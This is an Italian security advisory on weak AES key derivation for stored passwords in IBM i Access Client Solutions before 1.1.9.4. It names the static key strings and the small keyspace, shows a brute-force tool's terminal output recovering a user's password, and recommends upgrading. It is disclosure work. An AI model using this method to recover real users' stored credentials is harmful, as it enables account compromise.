
IBM i Access Client Solutions < 1.1.9.4 - Crittografia debole delle password
IBM i Access Client Solutions < 1.1.9.4 - Criptazione debole delle password
IBM i Access Client Solutions per memorizzare le password degli utenti utilizza l'algoritmo AES, tuttavia la chiave di crittografia di 16 byte è la combinazione di una stringa statica (Thanatos) e di caratteri casuali da una stringa che consiste di un'altra stringa statica (Behemoth) combinata con il nome utente, la home folder dell'utente, il sistema operativo (ad esempio Linux) combinato con la directory corrente in cui l'applicazione è stata avviata. Di conseguenza metà della chiave di crittografia è statica (stringa Thanatos) mentre la seconda metà è molto limitata. Ciò rende molto facile per un attaccante forzare la password anche su un singolo core della CPU.
Ecco un esempio di decifratura della password dell'utente mmajchrowicz utilizzando lo script as400_password_bruteforce_tool.java dall'account mkubiak:
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java as400_password_bruteforce_tool.java mmajchrowicz_funciton_admin_work.bin Linux mmajchrowicz /opt
IBM AS400 Password Bruteforce Tool v0.3 by Michał Majchrowicz AFINE Team
Full keyspace: mmajchrowiczLinux/opt/home/mmajchrowiczBehemoth
Full keyspace length: 47
Reduced keyspace: BmajchrowizLnux/pte
Reduced keyspace length: 19
Found good pass: Thanatosaun/Lcmo
Encrypted system password 7 bytes:
2E 1B 10 0A 1B 0D 0A
Decrypted system password 7 bytes:
50 65 6E 74 65 73 74
Decrypted system password: Pentest
Questo problema è stato causato dall'applicazione di una crittografia debole delle password. Questo problema è stato risolto in IBM i Access Client Solutions 1.1.9.4.
< 1.1.9.4
Aggiornare IBM i Access Client Solutions alla versione 1.1.9.4 o successiva.